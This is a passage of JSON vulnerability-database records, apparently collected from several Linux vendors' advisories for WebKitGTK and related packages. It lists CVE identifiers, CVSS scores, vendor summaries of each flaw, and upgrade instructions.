"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3709", "CVE-2020-35525", "CVE-2020-35527", "CVE-2020-36516", "CVE-2020-36518", "CVE-2020-36558", "CVE-2021-30002", "CVE-2021-3640", "CVE-2022-0168", "CVE-2022-0561", "CVE-2022-0562", "CVE-2022-0617", "CVE-2022-0854", "CVE-2022-0865", "CVE-2022-0891", "CVE-2022-0908", "CVE-2022-0909", "CVE-2022-0924", "CVE-2022-1016", "CVE-2022-1048", "CVE-2022-1055", "CVE-2022-1184", "CVE-2022-1292", "CVE-2022-1304", "CVE-2022-1355", "CVE-2022-1586", "CVE-2022-1785", "CVE-2022-1852", "CVE-2022-1897", "CVE-2022-1927", "CVE-2022-20368", "CVE-2022-2068", "CVE-2022-2078", "CVE-2022-2097", "CVE-2022-21499", "CVE-2022-21618", "CVE-2022-21619", "CVE-2022-21624", "CVE-2022-21626", "CVE-2022-21628", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22844", "CVE-2022-23960", "CVE-2022-24448", "CVE-2022-2509", "CVE-2022-25255", "CVE-2022-2586", "CVE-2022-26373", "CVE-2022-2639", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406", "CVE-2022-27664", "CVE-2022-27950", "CVE-2022-28390", "CVE-2022-2879", "CVE-2022-2880", "CVE-2022-28893", "CVE-2022-2938", "CVE-2022-29581", "CVE-2022-30293", "CVE-2022-32189", "CVE-2022-34903", "CVE-2022-3515", "CVE-2022-36946", "CVE-2022-37434", "CVE-2022-37603", "CVE-2022-39399", "CVE-2022-41715", "CVE-2022-42003", "CVE-2022-42004"], "modified": "2022-12-08T07:35:50", "id": "RHSA-2022:8781", "href": "https://access.redhat.com/errata/RHSA-2022:8781", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2023-05-03T06:59:05", "description": " ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "oraclelinux", "title": "webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-22T00:00:00", "id": "ELSA-2022-8054", "href": "http://linux.oracle.com/errata/ELSA-2022-8054.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-15T15:26:08", "description": "glib2\n[2.56.4-159.0.1]\n- Rebuild with python 36 [Orabug: 34701176]\n[2.56.4-159]\n- Add --interface-info-[body|header] modes to gdbus-codegen\n- Related: #2061994\nwebkit2gtk3", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-15T00:00:00", "type": "oraclelinux", "title": "webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-15T00:00:00", "id": "ELSA-2022-7704", "href": "http://linux.oracle.com/errata/ELSA-2022-7704.html", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "almalinux": [{"lastseen": "2023-08-11T23:46:17", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nGLib provides the core application building blocks for libraries and applications written in C. It provides the core object system used in GNOME, the main loop implementation, and a large set of utility functions for strings and common data structures.\n\nSecurity Fix(es):\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22628)\n* webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n* webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26709)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26710)\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26716)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26717)\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26719)\n* webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the AlmaLinux Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-08T00:00:00", "type": "almalinux", "title": "Moderate: webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-15T06:02:31", "id": "ALSA-2022:7704", "href": "https://errata.almalinux.org/8/ALSA-2022-7704.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-11T23:46:40", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.\n\nSecurity Fix(es):\n\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22624)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-22628)\n* webkitgtk: Buffer overflow leading to arbitrary code execution (CVE-2022-22629)\n* webkitgtk: Cookie management issue leading to sensitive user information disclosure (CVE-2022-22662)\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26700)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26709)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26710)\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26716)\n* webkitgtk: Use-after-free leading to arbitrary code execution (CVE-2022-26717)\n* webkitgtk: Memory corruption issue leading to arbitrary code execution (CVE-2022-26719)\n* webkitgtk: Heap buffer overflow in WebCore::TextureMapperLayer::setContentsLayer leading to arbitrary code execution (CVE-2022-30293)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the AlmaLinux Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-15T00:00:00", "type": "almalinux", "title": "Moderate: webkit2gtk3 security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293"], "modified": "2022-11-18T23:18:50", "id": "ALSA-2022:8054", "href": "https://errata.almalinux.org/9/ALSA-2022-8054.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-08-12T00:38:33", "description": "### Background\n\nWebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers.\n\n### Description\n\nMultiple vulnerabilities have been discovered in WebKitGTK+. Please review the CVE identifiers referenced below for details.\n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll WebKitGTK+ users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-libs/webkit-gtk-2.36.7\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-31T00:00:00", "type": "gentoo", "title": "WebKitGTK+: Multiple Vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22589", "CVE-2022-22590", "CVE-2022-22592", "CVE-2022-22620", "CVE-2022-22624", "CVE-2022-22628", "CVE-2022-22629", "CVE-2022-22662", "CVE-2022-22677", "CVE-2022-2294", "CVE-2022-26700", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26719", "CVE-2022-30293", "CVE-2022-30294", "CVE-2022-32784", "CVE-2022-32792", "CVE-2022-32893"], "modified": "2022-08-31T00:00:00", "id": "GLSA-202208-39", "href": "https://security.gentoo.org/glsa/202208-39", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2023-09-07T04:19:30", "description": "**Issue Overview:**\n\nA logic issue was addressed with improved state management. (CVE-2020-22592)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.1, iOS 14.2 and iPadOS 14.2, iCloud for Windows 11.5, Safari 14.0.1, tvOS 14.2, iTunes 12.11 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2020-27918)\n\n\"Clear History and Website Data\" did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, iOS 14.3 and iPadOS 14.3, tvOS 14.3. A user may be unable to fully delete browsing history. (CVE-2020-29623)\n\nThis issue was addressed with improved iframe sandbox enforcement. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2021-1765)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4, Safari 14.0.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1788)\n\nA type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4, Safari 14.0.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1789)\n\nA port redirection issue was found in WebKitGTK and WPE WebKit in versions prior to 2.30.6. A malicious website may be able to access restricted ports on arbitrary servers. The highest threat from this vulnerability is to data integrity. (CVE-2021-1799)\n\nThis issue was addressed with improved iframe sandbox enforcement. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2021-1801)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1817)\n\nA memory initialization issue was addressed with improved memory handling. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may result in the disclosure of process memory. (CVE-2021-1820)\n\nAn input validation issue was addressed with improved input validation. This issue is fixed in iTunes 12.11.3 for Windows, iCloud for Windows 12.3, macOS Big Sur 11.3, Safari 14.1, watchOS 7.4, tvOS 14.5, iOS 14.5 and iPadOS 14.5. Processing maliciously crafted web content may lead to a cross site scripting attack. (CVE-2021-1825)\n\nA logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2021-1826)\n\nA memory corruption issue was addressed with improved validation. This issue is fixed in iOS 14.4.1 and iPadOS 14.4.1, Safari 14.0.3 (v. 14610.4.3.1.7 and 15610.4.3.1.7), watchOS 7.3.2, macOS Big Sur 11.2.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-1844)\n\nA logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, iOS 14.4 and iPadOS 14.4. A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-1870)\n\nA use-after-free vulnerability exists in the way certain events are processed for ImageLoader objects of Webkit WebKitGTK 2.30.4. A specially crafted web page can lead to a potential information leak and further memory corruption. In order to trigger the vulnerability, a victim must be tricked into visiting a malicious webpage. (CVE-2021-21775)\n\nA use-after-free vulnerability exists in the way Webkit's GraphicsContext handles certain events in WebKitGTK 2.30.4. A specially crafted web page can lead to a potential information leak and further memory corruption. A victim must be tricked into visiting a malicious web page to trigger this vulnerability. (CVE-2021-21779)\n\nAn exploitable use-after-free vulnerability exists in WebKitGTK browser version 2.30.3 x64. A specially crafted HTML web page can cause a use-after-free condition, resulting in remote code execution. The victim needs to visit a malicious web site to trigger the vulnerability. (CVE-2021-21806)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.1, iOS 12.5.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30661)\n\nAn integer overflow was addressed with improved input validation. This issue is fixed in iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, Safari 14.1.1, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30663)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 7.4.1, iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30665)\n\nA buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 12.5.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30666)\n\nA logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious application may be able to leak sensitive user information. (CVE-2021-30682)\n\nA logic issue was addressed with improved state management. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2021-30689)\n\nA logic issue was addressed with improved restrictions. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. A malicious website may be able to access restricted ports on arbitrary servers. (CVE-2021-30720)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30734)\n\nDescription: A cross-origin issue with iframe elements was addressed with improved tracking of security origins. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2021-30744)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 14.6, iOS 14.6 and iPadOS 14.6, Safari 14.1.1, macOS Big Sur 11.4, watchOS 7.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30749)\n\nA type confusion issue was addressed with improved state handling. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30758)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.5.4. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30761)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.5.4. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. (CVE-2021-30762)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30795)\n\nThis issue was addressed with improved checks. This issue is fixed in iOS 14.7, Safari 14.1.2, macOS Big Sur 11.5, watchOS 7.6, tvOS 14.7. Processing maliciously crafted web content may lead to code execution. (CVE-2021-30797)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 14.7, macOS Big Sur 11.5, Security Update 2021-004 Catalina, Security Update 2021-005 Mojave. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30799)\n\nA use-after-free flaw was found in WebKitGTK. Specially crafted web content could use this flaw to trigger an arbitrary code execution when processed. (CVE-2021-30809)\n\nA confusion type flaw was found in WebKitGTK. Specially crafted web content could use this flaw to trigger an arbitrary code execution when processed. (CVE-2021-30818)\n\nAn out-of-bounds read flaw was found in WebKitGTK. A specially crafted audio file could use this flaw to trigger a disclosure of memory when processed. (CVE-2021-30836)\n\nA memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, watchOS 8. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30846)\n\nA memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, Safari 15, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code execution. (CVE-2021-30848)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 14.8 and iPadOS 14.8, watchOS 8, Safari 15, tvOS 15, iOS 15 and iPadOS 15, iTunes 12.12 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30849)\n\nA memory corruption vulnerability was addressed with improved locking. This issue is fixed in Safari 15, tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Processing maliciously crafted web content may lead to code execution. (CVE-2021-30851)\n\nA logic issue was addressed with improved restrictions. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy. (CVE-2021-30887)\n\nAn information leak flaw was found in WebKitGTK. A malicious web site using Content Security Policy reports could use this flaw to leak information via redirects. (CVE-2021-30888)\n\nA buffer overflow flaw was found in WebKitGTK. Specially crafted web content could use this flaw to trigger an arbitrary code execution when processed. (CVE-2021-30889)\n\nA logic issue was addressed with improved state management. This issue is fixed in macOS Monterey 12.0.1, iOS 15.1 and iPadOS 15.1, watchOS 8.1, tvOS 15.1. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2021-30890)\n\nA buffer overflow issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30934)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30936)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30951)\n\nAn integer overflow was addressed with improved input validation. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30952)\n\nAn out-of-bounds read was addressed with improved bounds checking. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30953)\n\nA type confusion issue was addressed with improved memory handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30954)\n\nA race condition was addressed with improved state handling. This issue is fixed in tvOS 15.2, macOS Monterey 12.1, Safari 15.2, iOS 15.2 and iPadOS 15.2, watchOS 8.3. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2021-30984)\n\n** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2021. Notes: none. (CVE-2021-32912)\n\nBubblewrapLauncher.cpp in WebKitGTK and WPE WebKit before 2.34.1 allows a limited sandbox bypass that allows a sandboxed process to trick host processes into thinking the sandboxed process is not confined by the sandbox, by abusing VFS syscalls that manipulate its filesystem namespace. The impact is limited to host services that create UNIX sockets that WebKit mounts inside its sandbox, and the sandboxed process remains otherwise confined. NOTE: this is similar to CVE-2021-41133. (CVE-2021-42762)\n\nA segmentation violation vulnerability was found in webkitgtk. An attacker with network access could pass specially crafted HTML files causing an application to halt or crash. (CVE-2021-45481)\n\nA use-after-free vulnerability was found in webkitgtk. An attacker with network access could pass specially crafted HTML files causing an application to halt or crash. (CVE-2021-45482)\n\nA use-after-free vulnerability was found in webkitgtk. An attacker with network access could pass specially crafted HTML files causing an application to halt or crash. (CVE-2021-45483)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-22590)\n\nA logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. (CVE-2022-22592)\n\nA cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\nA logic issue in the handling of concurrent media was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be interrupted if the user answers a phone call. (CVE-2022-22677)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to code execution. (CVE-2022-26700)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26709)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26716)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26717)\n\nA memory corruption issue was addressed with improved state management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, watchOS 8.6, macOS Monterey 12.4, Safari 15.5. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26719)\n\nIn WebKitGTK through 2.36.0 (and WPE WebKit), there is a heap-based buffer overflow in WebCore::TextureMapperLayer::setContentsLayer in WebCore/platform/graphics/texmap/TextureMapperLayer.cpp. (CVE-2022-30293)\n\nAn out-of-bounds write issue was addressed with improved input validation. This issue is fixed in iOS 15.6 and iPadOS 15.6, watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, Safari 15.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-32792)\n\nMultiple out-of-bounds 